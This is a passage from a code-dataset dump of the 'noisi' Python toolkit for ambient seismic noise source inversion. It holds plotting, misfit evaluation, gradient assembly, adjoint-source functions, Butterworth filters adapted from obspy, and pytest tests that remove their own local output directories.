Basemap(rsphere=6378137,**kwargs)\n m.drawcoastlines()\n\n m.plot(gridpoints[0],gridpoints[1],'go',markersize=10.,latlon=True)\n plt.show()\n\n\ndef plot_window(correlation, window, measurement):\n\n\n maxlag = correlation.stats.npts * correlation.stats.delta\n lag = np.linspace(-maxlag,maxlag,correlation.stats.npts)\n\n plt.plot(lag,correlation.data/np.max(np.abs(correlation.data)))\n plt.plot(lag,window/np.max(np.abs(window)),'--')\n plt.title(correlation.id)\n plt.text(0,-0.75,'Measurement value: %g' %measurement)\n plt.xlabel('Correlation Lag in seconds.')\n plt.ylabel('Normalized correlation and window.')\n\n plt.show()\n\ndef plot_envelope(corr,env):\n max_lag = (corr.stats.npts-1)/2 * corr.stats.delta\n lag = np.linspace(-max_lag,max_lag,corr.stats.npts)\n plt.plot(lag,corr.data/np.max(np.abs(corr.data)),'k')\n plt.plot(lag,env/np.max(np.abs(env)),'r',linewidth=2.)\n plt.grid()\n plt.xlabel('Lag (s)')\n plt.ylabel('Normalized correlation / normalized envelope')\n plt.show()\n"
},
{
"alpha_fraction": 0.6790322661399841,
"alphanum_fraction": 0.6862903237342834,
"avg_line_length": 25.36170196533203,
"blob_id": "5db7a76161fbf568ff6597ab2f0a5167ea4f1382",
"content_id": "9f591b23ab0ed0be0b34cee6d67c03277677199d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1240,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 47,
"path": "/noisi/util/evaluate_misfit.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "import sys\nfrom pandas import read_csv\nimport json\nimport os\nimport numpy as np\nfrom glob import glob\n\n# evaluate measurement\nsource_dir = sys.argv[1]\nstep = sys.argv[2]\n\n# get weights for freq. bands\nmeasr_config = json.load(open(os.path.join(source_dir,\n\t'measr_config.json')))\nweights = measr_config['weights']\nmtype = measr_config['mtype']\n\n# for each freq. band,...\nstep_tests = glob(os.path.join(source_dir,'step_'+step,'steptest_*'))\n\nresult = np.zeros((len(step_tests),2))\n\nfor i in range(len(step_tests)):\n\tfor j in range(len(weights)):\n\t\t# what step length?\n\t\tresult[i,0]=(float(step_tests[i].split('_')[-1]))\n\n\t\t# load the measurements\n\t\tfilename = '{}.{}.measurement.csv'.format(mtype,j)\n\t\tmsr_file = os.path.join(step_tests[i],filename)\n\t\tdat = read_csv(msr_file)\n\n\t\n\t\t# take the average\n\t\tresult[i,1] += dat.l2_norm.mean()/len(weights) * weights[j]\n\n\nnp.save('result_step_length_test.npy',result)\n\n# Read misfit of previous step and print that\nmf = 0\nfor j in range(len(weights)):\n\tfilename = '{}.{}.measurement.csv'.format(mtype,j)\n\tmsr_file = os.path.join(source_dir,'step_'+step,filename)\n\tdat = read_csv(msr_file)\n\tmf += dat.l2_norm.mean()/len(weights) * weights[j]\nprint(\"Average misfit of all frequency bands: %g\" %mf)\n\n"
},
{
"alpha_fraction": 0.6829559206962585,
"alphanum_fraction": 0.711561381816864,
"avg_line_length": 31.269229888916016,
"blob_id": "18c55cb8ef594209ba49ebddde239884253f12e1",
"content_id": "8206ae2a230810e1edb25ca153c81936cbe8ea7b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 839,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 26,
"path": "/noisi/test/test_adjoint.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "import os\nfrom obspy import read\n\ndef test_adjoint():\n\t# copy the correlation\n\tos.mkdir('test/testdata/testsrc/step_0/corr')\n\tos.system('cp test/testdata/testsrc/step_0/corr_archived/*.sac \\\n\t\ttest/testdata/testsrc/step_0/corr/')\n\tos.mkdir('test/testdata/testsrc/step_0/adjt/')\n\n\t# run forward model\n\tos.system('noisi measurement test/testdata/testsrc/ 0')\n\n\t# assert the results are the same\n\t# ToDo: path\n\t\n\ttr1 = read('test/testdata/testsrc/step_0/adjt/NET.STA1..CHA--NET.STA2..CHA.0.sac')[0]\n\ttr2 = read('test/testdata/testsrc/step_0/adjt_archived/NET.STA1..CHA--NET.STA2..CHA.0.sac')[0]\n\t\n\tassert (tr1.data == tr2.data).sum() == len(tr2.data)\n\tassert tr1.stats.sampling_rate == tr2.stats.sampling_rate\n\t\n\t\n\t# remove stuff\n\tos.system('rm -rf test/testdata/testsrc/step_0/corr/')\n\tos.system('rm -rf test/testdata/testsrc/step_0/adjt/')\n"
},
{
"alpha_fraction": 0.6256560683250427,
"alphanum_fraction": 0.6339919567108154,
"avg_line_length": 30.12980842590332,
"blob_id": "d58fc2b3dbe60ebf67b2bf9e6bd776a9d3663bb5",
"content_id": "16ba339105fe7ff7abd327228cd90ebf908e67f6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6478,
"license_type": "no_license",
"max_line_length": 149,
"num_lines": 208,
"path": "/noisi/scripts/assemble_gradient.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport pandas as pd\nimport os\nimport json\nfrom glob import glob\nfrom math import isnan\nfrom noisi import NoiseSource\ntry:\t\n\tfrom noisi.util.plot import plot_grid\nexcept:\n\tpass\nfrom warnings import warn\n\ndef assemble_ascent_dir(source_model,step,snr_min,n_min,save_all=False,\n\tnormalize_gradient=False):\n\n# where is the measurement database located?\n\tsource_config=json.load(open(source_model))\n\tdatadir = os.path.join(source_config['source_path'],'step_' + str(step))\n\toutfile\t= os.path.join(datadir,'grad','grad_info.txt')\n\tif os.path.exists(outfile):\n\t\tos.system('rm '+outfile)\n\n# Figure out how many spectral basis functions there are:\n\twith NoiseSource(os.path.join(datadir,'starting_model.h5')) as nsrc:\n\t\tn_basis = nsrc.spect_basis.shape[0]\n\n\n# allocate the kernel array\n\tgrd = np.load(os.path.join(source_config['project_path'],'sourcegrid.npy'))\n\n\tgradient = np.zeros((n_basis,np.shape(grd)[1]))\n\n# get the predefined weights\n\tmeasr_config = json.load(open(os.path.join(source_config['source_path'],\\\n\t\t'measr_config.json')))\n\tm_type = measr_config['mtype']\n\ttry:\n\t\tvar_weights = measr_config['weights']\n\texcept KeyError:\n\t\tvar_weights = np.ones(n_basis)\n\n\n# Loop over basis functions\n\n\tfor ix_basis in range(n_basis):\n\n\t\tmsrfile = os.path.join(datadir,\"{}.{}.measurement.csv\".\\\n\t\t\tformat(measr_config['mtype'],ix_basis))\n\n\n\n\t# Read in the csv files of measurement.\n\n\t\tdata = pd.read_csv(msrfile)\n\n\n\t# loop over stationpairs\n\n\t\tcnt_success = 0\n\t\tcnt_lowsnr = 0\n\t\tcnt_lown = 0\n\t\tcnt_overlap = 0\n\t\tcnt_unavail = 0\n\t\tn = len(data)\n\t\tprint('Nr Measurements:')\n\t\tprint(n)\n\t\tprint('*'*16)\n\n\t\tfor i in range(n):\n\n\t\t\tif data.at[i,'snr'] < snr_min and data.at[i,'snr_a'] < snr_min:\n\t\t\t\tcnt_lowsnr += 1\n\t\t\t\tcontinue\n\n\t\t\tif data.at[i,'nstack'] < n_min:\n\t\t\t\tcnt_lown += 1\n\t\t\t\tcontinue\n\n\n\t# ToDo: deal with station pairs with several measurements (with different instruments)\n\t# (At the moment, just all added. Probably fine on this large scale)\n\t# find kernel file\n\t\t\tsta1 = data.at[i,'sta1']\n\t\t\tsta2 = data.at[i,'sta2']\n\t\t\n\t\t\t#if sta1.split('.')[-1][-1] in ['E','N','T','R']:\n\t\t#\t\tmsg = \"Cannot yet handle horizontal components\"\n\t#\t\t\traise NotImplementedError(msg)\n\t#\t\tif sta2.split('.')[-1][-1] in ['E','N','T','R']:\n\t#\t\t\tmsg = \"Cannot yet handle horizontal components\"\n\t#\t\t\traise NotImplementedError(msg)\n\t\t\n\t\t\n\t# ToDo !!! Replace this by a decent formulation, where the channel is properly set !!! No error for E, R, T, N\n\t\t\tsta1 = \"*.{}..{}\".format(sta1.split('.')[1],source_config['channel']) # ignoring network: IRIS has sometimes several network codes at same station\n\t\t\tsta2 = \"*.{}..{}\".format(sta2.split('.')[1],source_config['channel']) # ignoring network: IRIS has sometimes several network codes at same station\n\t\t\n\t\t\tkernelfile1 = os.path.join(datadir,'kern',\"{}--{}.{}.npy\".format(sta1,sta2,ix_basis))\n\t\t\tkernelfile2 = os.path.join(datadir,'kern',\"{}--{}.{}.npy\".format(sta2,sta1,ix_basis))\n\t\t\t# Same problem with different network codes.\n\t\t\t# Due to station pairs being in alphabetic order of network.station.loc.cha, different network\n\t\t\t# codes also lead to different ordering.\n\t\t\ttry:\n\t\t\t\tkernelfile = glob(kernelfile1)[0]\n\t\t\texcept IndexError:\n\t\t\t\ttry: \n\t\t\t\t\tkernelfile = glob(kernelfile2)[0]\n\t\t\t\texcept IndexError:\n\t\t\t\t\tkernelfile = kernelfile1 \n\t\t\t\t\t# Check that first, and then complain.\n\n\n\n\n\t# Skip if entry is nan: This is most likely due to no measurement taken because station distance too short\t\n\t\t\tif (isnan(data.at[i,'obs']) and m_type \n\t\t\t\tin ['ln_energy_ratio','energy_diff']):\n\t\t\t\tprint(\"No measurement in dataset for:\")\n\t\t\t\tprint(os.path.basename(kernelfile))\n\t\t\t\tcnt_overlap += 1\n\t\t\t\tcontinue\n\n\t# ...unless somehow the kernel went missing (undesirable case!)\n\n\t\t\tif not os.path.exists(kernelfile):\n\t\t\t\tprint(\"File does not exist:\")\n\t\t\t\tprint(os.path.basename(kernelfile))\n\t\t\t\tcnt_unavail += 1\n\t\t\t\tcontinue\n\n\n\t# load kernel\n\t\t\tkernel = np.load(kernelfile)\n\t\t\tif True in np.isnan(kernel):\n\t\t\t\tprint(\"kernel contains nan, skipping\")\n\t\t\t\tprint(os.path.basename(kernelfile))\n\t\t\t\tcontinue\n\n\n\t# multiply kernel and measurement, add to descent dir.\n\t# always assuming L2 norm here!\n\t\t\n\t\t\telse:\n\n\t\t\t\tif kernel.shape[-1] == 1:\n\n\t\t\t\t\tkernel = kernel[:,0]\n\n\t\t\t\t\tif m_type in ['ln_energy_ratio','energy_diff']:\n\t\t\t\t\t\tkernel *= (data.at[i,'syn'] - data.at[i,'obs'])\n\t\t\t\t\t\n\n\t\t\t\telif kernel.shape[-1] == 2:\n\t\t\t\t\tif m_type in ['ln_energy_ratio','energy_diff']:\n\t\t\t\t\t\tkernel[:,0] *= (data.at[i,'syn'] - data.at[i,'obs'])\n\t\t\t\t\t\tkernel[:,1] *= (data.at[i,'syn_a'] - data.at[i,'obs_a'])\n\t\t\t\t\t\tkernel = kernel[:,0] + kernel[:,1]\n\t\t\t\t\t#if m_type in ['envelope']:\n\t\t\t\t#\t\tkernel = kernel[:,0] + kernel[:,1]\n\t\t\t\tcnt_success += 1 # yuhu\n\n\t\t\t\n\t\n\t\t\t\n\t\t# collect\n\t\t\tgradient[ix_basis,:] += kernel * var_weights[ix_basis]\n\t\t\tdel kernel\n\n# save\n\tif save_all:\n\t\twarn('This option is discontinued, because all the single kernels are\\\n\t\t\tavailable in the kern/ directory.')\n\n\n\tif normalize_gradient:\n\t\tgradient /= np.abs(gradient).max()\n\t\n\tkernelfile = os.path.join(datadir,'grad','grad_all.npy')\n\tnp.save(kernelfile,gradient)\n\n\t# output metadata\n\t\t\n\twith open(outfile,'a') as fh:\n\n\t\tfh.write('Analyzed %g station pairs of %g successfully.\\n' %(cnt_success,n))\n\t\tfh.write('No data found for %g station pairs.\\n' %cnt_unavail)\n\t\tfh.write('No measurement taken for %g station pairs due to short interstation distance.\\n' %cnt_overlap) \n\t\tfh.write('Signal to noise ratio below threshold for %g station pairs.\\n' %cnt_lowsnr)\n\t\tfh.write('Number of staacked windows below threshold for %g station pairs.\\n' %cnt_lown)\n\t\tfh.write('\\nParameters:==============================================================\\n')\n\t\tfh.write('Source dir: %s \\n' %source_model)\n\t\tfh.write('Step: %g' %int(step))\n\t\tfh.write('Minimum SNR: %g' %snr_min)\n\t\tfh.write('Minimum stack length: %g' %int(n_min))\n\t\tfh.write('Save all interstation gradients: %s' %str(save_all))\n\t\tfh.write('\\n=========================================================================\\n')\n\t\tfh.write('Project:\\n')\n\t\t# append configurations\n\t\tcfg = open(os.path.join(source_config['project_path'],'config.json')).read()\n\t\tfh.write(cfg)\n\t\tfh.write('\\n=========================================================================\\n')\n\t\tfh.write('Source model:\\n')\n\t\tfh.write(json.dumps(source_config))\n\t\tfh.write('\\n=========================================================================\\n')\n\t\tfh.write('Measurement:\\n')\n\t\tcfg = open(os.path.join(source_config['source_path'],'measr_config.json')).read()\n\t\tfh.write(cfg)\n\n\t\n"
},
{
"alpha_fraction": 0.6992031931877136,
"alphanum_fraction": 0.7151394486427307,
"avg_line_length": 26.83333396911621,
"blob_id": "6b2c844e5379fece8c021f95a56e6406d466c579",
"content_id": "16aeab3a95b1610b3c9d5efae7399420b6061cd6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 502,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 18,
"path": "/noisi/test/test_zz_noisi.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "import os\nimport sys\n\n\ndef test_zz_noisi():\n\n\n\tif os.path.exists(\"test/testdata/testsrc/step_0/corr\"):\n\t\tos.system(\"rm -rf test/testdata/testsrc/step_0/corr\")\n\n\tif os.path.exists(\"test/testdata/testsrc/step_0/adjt\"):\n\t\tos.system(\"rm -rf test/testdata/testsrc/step_0/adjt\")\n\n\tif os.path.exists(\"test/testdata/testsrc/step_0/kern\"):\n\t\tos.system(\"rm -rf test/testdata/testsrc/step_0/kern\")\n\n\tif os.path.exists(\"test/testdata/testsrc/step_0/grad\"):\n\t\tos.system(\"rm -rf test/testdata/testsrc/step_0/grad\")\n\n"
},
{
"alpha_fraction": 0.5821782350540161,
"alphanum_fraction": 0.5957095623016357,
"avg_line_length": 25.814159393310547,
"blob_id": "f4b32589e8bf3d55b33c1e299a57357c4e51bed1",
"content_id": "7d8fde7cb10b4b73a4bb99703ea5662d4414cbd4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3030,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 113,
"path": "/noisi/scripts/adjnt_functs.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "import numpy as np\nfrom math import pi\n#from noisi.scripts import measurements as rm\nfrom noisi.util import windows as wn\nfrom scipy.signal import fftconvolve\nfrom scipy.signal import hilbert\n\n\n\n\ndef log_en_ratio_adj(corr_o,corr_s,g_speed,window_params):\n\n success = False\n\n window = wn.get_window(corr_o.stats,g_speed,window_params)\n win = window[0]\n #msr_o = rm.log_en_ratio(corr_o,g_speed,window_params)\n #msr_s = rm.log_en_ratio(corr_s,g_speed,window_params)\n data = wn.my_centered(corr_s.data,corr_o.stats.npts)\n\n if window[2] == True:\n sig_c = corr_s.data * win\n sig_a = corr_s.data * win[::-1]\n E_plus = np.trapz(np.power(sig_c,2))*corr_s.stats.delta\n E_minus = np.trapz(np.power(sig_a,2))*corr_s.stats.delta\n # to win**2\n u_plus = sig_c * win\n u_minus = sig_a * win[::-1]\n #adjt_src = 2./pi * (msr_s-msr_o) * (u_plus / E_plus - u_minus / E_minus)\n # I don't know where that factor 1/pi came from. Not consistent with new derivation of kernels\n adjt_src = 2. * (u_plus / E_plus - u_minus / E_minus)\n success = True\n else:\n adjt_src = win-win+np.nan\n return adjt_src, success\n\ndef windowed_waveform(corr_o,corr_s,g_speed,window_params):\n success = False\n window = wn.get_window(corr_o.stats,g_speed,window_params)\n win = window[0] + window[0][::-1]\n if window[2]:\n\n u_s = np.multiply(win,corr_s.data)\n u_o = np.multiply(win,corr_o.data)\n\n adjt_src = np.multiply(win,(u_s-u_o))\n success = True\n else:\n adjt_src = win-win+np.nan\n\n return adjt_src, success\n\n\ndef square_envelope(corr_o,corr_s,g_speed,\n window_params):\n success = False\n env_s = corr_s.data**2 + np.imag(hilbert(corr_s.data))**2\n env_o = corr_o.data**2 + np.imag(hilbert(corr_o.data))**2\n d_env_1 = 2. * corr_s.data \n d_env_2 = (2. * np.imag(hilbert(corr_s.data)))\n\n u1 = (env_s - env_o) * d_env_1\n u2 = np.imag(hilbert((env_s - env_o) * d_env_2))\n\n adjt_src = u1 - u2\n \n success = True\n return adjt_src, success\n\n\n\n\ndef energy(corr_o,corr_s,g_speed,window_params):\n\n success = False\n\n window = wn.get_window(corr_o.stats,g_speed,window_params)\n\n #if window_params['causal_side']:\n win = window[0]\n #else:\n # win = window[0][::-1]\n\n if window[2]:\n u1 = 2* np.multiply(np.power(win,2),corr_s.data)\n u2 = 2* np.multiply(np.power(win[::-1],2),corr_s.data)\n adjt_src = [u1,u2]\n success = True\n else:\n adjt_src = [win-win+np.nan,win-win+np.nan]\n\n return adjt_src, success\n\n\n\n\ndef get_adj_func(mtype):\n if mtype == 'ln_energy_ratio':\n func = log_en_ratio_adj\n\n elif mtype == 'energy_diff':\n func = energy\n\n elif mtype == 'windowed_waveform':\n func = windowed_waveform\n\n elif mtype == 'square_envelope':\n func = square_envelope\n\n else:\n msg = 'Measurement functional %s not currently implemented.' %mtype\n raise ValueError(msg)\n return func\n"
},
{
"alpha_fraction": 0.719197690486908,
"alphanum_fraction": 0.7421203255653381,
"avg_line_length": 25.769229888916016,
"blob_id": "686e4af3bad59a9154d8a33e65d350ac051d2bec",
"content_id": "2b84397ab7daa71b3ea3c894712866e7e0b632bc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 349,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 13,
"path": "/noisi/__init__.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "import sys\nimport mpi4py\nimport os\n_ROOT = os.path.abspath(os.path.dirname(__file__))\nprint('='*80)\nprint(\"NOISI toolkit\")\nprint(\"Python version: \"+sys.version)\nprint(\"mpi4py version: \"+mpi4py.__version__)\nprint(_ROOT)\nprint('='*80)\nfrom mpi4py import MPI\nfrom .my_classes.wavefield import WaveField\nfrom .my_classes.noisesource import NoiseSource\n\n"
},
{
"alpha_fraction": 0.6148970127105713,
"alphanum_fraction": 0.6228209137916565,
"avg_line_length": 18.090909957885742,
"blob_id": "0c5cc89fbd2d7bccbcbb601cd8c363491709221e",
"content_id": "1895401725ca4f1bac9b94ef17a1ebe8778b612b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 631,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 33,
"path": "/noisi/util/add_noise_to_data_or_synthetics.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "import numpy as np\nfrom glob import glob\nfrom obspy import read\nimport sys\n\nif __name__ == '__main__':\n\n\tdirectory = sys.argv[1]\n\n\tperc_of_max = float(sys.argv[2])\n\n\ttry:\n\t\tformat = sys.argv[3]\n\texcept IndexError:\n\t\tformat = 'sac'\n\n\ttry:\n\t\to = sys.argv[4]\n\texcept IndexError:\n\t\to = input('Are you sure you want to add noise? [n]/yes:\\n')\n\n\n\n\ttraces = glob(directory +'/*.'+format.upper())\n\ttraces += glob(directory + '/*.'+format.lower())\n\t\n\tif o != 'yes':\n\t\tsys.exit(\"Nothing added.\")\n\telse:\n\t\tfor t in traces:\n\t\t\ttr = read(t)[0]\n\t\t\ttr.data += np.random.randn(len(tr.data))*tr.data.max()*perc_of_max\n\t\t\ttr.write(t,format=format)\n\n"
},
{
"alpha_fraction": 0.6951530575752258,
"alphanum_fraction": 0.7283163070678711,
"avg_line_length": 34.54545593261719,
"blob_id": "d9d00c1e5441ac64c5178cb707a1d0a8c7b9d433",
"content_id": "7e47bc8dc4d9114c4a5d909493dfa4b6e4750fa7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 784,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 22,
"path": "/noisi/test/test_smoothing.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "import os\nimport numpy as np\n\ndef test_smoothing():\n\t\n\tos.mkdir('test/testdata/testsrc/step_0/grad')\n\tos.system('python util/smoothing.py test/testdata/testsrc/step_0/grad_archived/grad_all.npy \\\n\t\ttest/testdata/testsrc/step_0/grad/grad_smooth.npy test/testdata/sourcegrid.npy \\\n\t\t10.0 95 1e-16')\n\n\t# assert the results are the same\n\t# ToDo: path\n\t#n1 = NoiseSource('test/testdata/testsrc/step_1_archived/starting_model.h5')\n\t#n2 = NoiseSource('test/testdata/testsrc/step_1/starting_model.h5')\n\n\tgrad_old = np.load('test/testdata/testsrc/step_0/grad_archived/grad_smooth.npy')\n\tgrad = np.load('test/testdata/testsrc/step_0/grad/grad_smooth.npy')\n\t\n\tassert (abs(grad - grad_old)/grad_old*100.).max() < 1.e-16 \n\n\t# remove stuff\n\tos.system('rm -rf test/testdata/testsrc/step_0/grad/')\n\t\n"
},
{
"alpha_fraction": 0.6990769505500793,
"alphanum_fraction": 0.7058461308479309,
"avg_line_length": 24,
"blob_id": "ec4fb5ca623e95a20237520e0764cdda85e330fd",
"content_id": "9650e1d77c1c32dcf125717da48f4c024f67c338",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1625,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 65,
"path": "/noisi/scripts/run_preprocessing_data.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "from __future__ import print_function\nimport numpy as np\nimport os\nfrom glob import glob\nfrom obspy import read\nfrom noisi.util.windows import my_centered\nfrom obspy.signal.interpolation import plot_lanczos_windows\n\n\n#ToDo pass in all the now default options\ndef run_preprocess_data(source,bandpass=None,decimator=None,Fs_new=None,overwrite=False,fmt='sac'):\n\n\tdatalst = os.path.join(source,'observed_correlations','*.'+fmt.lower())\n\tdata = glob(datalst)\n\tdatalst = os.path.join(source,'observed_correlations','*.'+fmt.upper())\n\tdata.extend(glob(datalst))\n\n\tif data == []:\n\t\tprint('No data found.')\n\t\treturn()\n\n\tif not overwrite:\n\t\toutdir = os.path.join(source,'processed_correlations')\n\t\tos.mkdir(outdir)\n\telse:\n\t\toutdir = os.path.join(source,'observed_correlations')\n\n\n\tfor f in data:\n\n\t\ttry:\n\t\t\ttr = read(f)[0]\n\t\texcept:\n\t\t\tprint(\"Could not read file:\")\n\t\t\tprint(f)\t\n\t\t\tcontinue\n\n\t\tif bandpass is not None:\n\n\t\t\t# Using zerophase is essential for correlation\n\t\t\ttr.filter('bandpass',\n\t\t\t\tfreqmin = bandpass[0],\n\t\t\t\tfreqmax = bandpass[1],\n\t\t\t\tcorners = bandpass[2],\n\t\t\t\tzerophase=True)\n\n\n\t\tif decimator is not None:\n\n\t\t\ttr.decimate(decimator)\n\n\n\t\tif Fs_new is not None:\n\n\t\t\tif Fs_new < tr.stats.sampling_rate:\n\t\t\t\tprint('HAVE YOU filtered?')\n\t\t\tplot_lanczos_windows(a=40,filename='lanczos_response.eps')\n\t\t\ttr.interpolate(Fs_new, method='lanczos',a=40)\n\n\t\tif tr.stats.npts % 2 == 0:\n\t\t\ttr.data = my_centered(tr.data,tr.stats.npts-1)\n\n\t\ttr.write(os.path.join(outdir,os.path.basename(f)),format=fmt)\n\tprint('Preprocessing complete:')\n\tprint('Please rename folders, measurement will be taken on observed_correlations folder.')\n"
},
{
"alpha_fraction": 0.6052837371826172,
"alphanum_fraction": 0.6154598593711853,
"avg_line_length": 32.181819915771484,
"blob_id": "2d44441620045f90e35cb3ee3411382357515675",
"content_id": "c6d6b9a72547cc626813fd981d48bf591345abca",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5110,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 154,
"path": "/noisi/util/filter.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# ------------------------------------------------------------------\n# with modifications from obspy \n# Modifications: Do not apply the filter, but only return it.\n#\n#\n# Filename: filter.py\n# Purpose: Various Seismogram Filtering Functions\n# Author: Tobias Megies, Moritz Beyreuther, Yannik Behr\n# Email: [email protected]\n#\n# Copyright (C) 2009 Tobias Megies, Moritz Beyreuther, Yannik Behr\n# --------------------------------------------------------------------\n\nimport warnings\nfrom scipy.signal import iirfilter\ntry:\n from scipy.signal import zpk2sos, sosfilt\nexcept ImportError:\n from obspy.signal._sosfilt import _sosfilt as sosfilt\n from obspy.signal._sosfilt import _zpk2sos as zpk2sos\nfrom scipy.signal import cheb2ord, cheby2\n\n\"\"\"\nVarious Seismogram Filtering Functions from obspy\n\n:copyright:\n The ObsPy Development Team ([email protected])\n:license:\n GNU Lesser General Public License, Version 3\n (https://www.gnu.org/copyleft/lesser.html)\n\"\"\"\n\ndef cheby2_lowpass(df,freq,maxorder=8):\n # From obspy\n nyquist = df * 0.5\n # rp - maximum ripple of passband, rs - attenuation of stopband\n rp, rs, order = 1, 96, 1e99\n ws = freq / nyquist # stop band frequency\n wp = ws # pass band frequency\n # raise for some bad scenarios\n if ws > 1:\n ws = 1.0\n msg = \"Selected corner frequency is above Nyquist. \" + \\\n \"Setting Nyquist as high corner.\"\n warnings.warn(msg)\n while True:\n if order <= maxorder:\n break\n wp = wp * 0.99\n order, wn = cheb2ord(wp, ws, rp, rs, analog=0)\n (z, p, k) = cheby2(order, rs, wn, btype='low', analog=0, output='zpk')\n return zpk2sos(z, p, k)\n\n\ndef bandpass(freqmin, freqmax, df, corners=4):\n \"\"\"\n Butterworth-Bandpass Filter.\n\n Filter data from ``freqmin`` to ``freqmax`` using ``corners``\n corners.\n The filter uses :func:`scipy.signal.iirfilter` (for design)\n and :func:`scipy.signal.sosfilt` (for applying the filter).\n\n :type data: numpy.ndarray\n :param data: Data to filter.\n :param freqmin: Pass band low corner frequency.\n :param freqmax: Pass band high corner frequency.\n :param df: Sampling rate in Hz.\n :param corners: Filter corners / order.\n :param zerophase: If True, apply filter once forwards and once backwards.\n This results in twice the filter order but zero phase shift in\n the resulting filtered trace.\n :return: Filtered data.\n \"\"\"\n fe = 0.5 * df\n low = freqmin / fe\n high = freqmax / fe\n # raise for some bad scenarios\n if high > 1:\n high = 1.0\n msg = \"Selected high corner frequency is above Nyquist. \" + \\\n \"Setting Nyquist as high corner.\"\n warnings.warn(msg)\n if low > 1:\n msg = \"Selected low corner frequency is above Nyquist.\"\n raise ValueError(msg)\n z, p, k = iirfilter(corners, [low, high], btype='band',\n ftype='butter', output='zpk')\n sos = zpk2sos(z, p, k)\n return sos\n\ndef lowpass(freq, df, corners=4):\n \"\"\"\n Butterworth-Lowpass Filter.\n\n Filter data removing data over certain frequency ``freq`` using ``corners``\n corners.\n The filter uses :func:`scipy.signal.iirfilter` (for design)\n and :func:`scipy.signal.sosfilt` (for applying the filter).\n\n :type data: numpy.ndarray\n :param data: Data to filter.\n :param freq: Filter corner frequency.\n :param df: Sampling rate in Hz.\n :param corners: Filter corners / order.\n :param zerophase: If True, apply filter once forwards and once backwards.\n This results in twice the number of corners but zero phase shift in\n the resulting filtered trace.\n :return: Filtered data.\n \"\"\"\n fe = 0.5 * df\n f = freq / fe\n # raise for some bad scenarios\n if f > 1:\n f = 1.0\n msg = \"Selected corner frequency is above Nyquist. \" + \\\n \"Setting Nyquist as high corner.\"\n warnings.warn(msg)\n z, p, k = iirfilter(corners, f, btype='lowpass', ftype='butter',\n output='zpk')\n sos = zpk2sos(z, p, k)\n return sos\n\n\ndef highpass(freq, df, corners=4):\n \"\"\"\n Butterworth-Highpass Filter.\n\n Filter data removing data below certain frequency ``freq`` using\n ``corners`` corners.\n The filter uses :func:`scipy.signal.iirfilter` (for design)\n and :func:`scipy.signal.sosfilt` (for applying the filter).\n\n :type data: numpy.ndarray\n :param data: Data to filter.\n :param freq: Filter corner frequency.\n :param df: Sampling rate in Hz.\n :param corners: Filter corners / order.\n :param zerophase: If True, apply filter once forwards and once backwards.\n This results in twice the number of corners but zero phase shift in\n the resulting filtered trace.\n :return: Filtered data.\n \"\"\"\n fe = 0.5 * df\n f = freq / fe\n # raise for some bad scenarios\n if f > 1:\n msg = \"Selected corner frequency is above Nyquist.\"\n raise ValueError(msg)\n z, p, k = iirfilter(corners, f, btype='highpass', ftype='butter',\n output='zpk')\n sos = zpk2sos(z, p, k)\n return sos\n"
},
{
"alpha_fraction": 0.6788124442100525,
"alphanum_fraction": 0.7152496576309204,
"avg_line_length": 36.04999923706055,
"blob_id": "fab182ea0066c2b89bd58917790ab730215b6b12",
"content_id": "cad0d5d7b982ea4c1bdf9780713d5af363b5d9ce",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 741,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 20,
"path": "/noisi/test/test_process.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "import h5py\nimport os\n\ndef test_process():\n\t# run preprocessing\n\tos.system('noisi preprocess_synthetics test/testdata/testsrc/')\n\t# compare\n\tf1 = h5py.File('test/testdata/testsrc/wavefield_processed/NET.STA1..CHA.h5')\n\tf2 = h5py.File('test/testdata/testsrc/wavefield_processed_archived/NET.STA1..CHA.h5')\n\n\tassert ((f1['data'][:][0]-f2['data'][:][0])/\n\t\tf1['data'][:][0]).max() < 1.e-6\n\t\n\tf1 = h5py.File('test/testdata/testsrc/wavefield_processed/NET.STA2..CHA.h5')\n\tf2 = h5py.File('test/testdata/testsrc/wavefield_processed_archived/NET.STA2..CHA.h5')\n\n\tassert f1['stats'].attrs['reference_station'] == f2['stats'].attrs['reference_station']\n\n\t# delete preprocessed directory\n\tos.system('rm -rf test/testdata/testsrc/wavefield_processed/')\n"
},
{
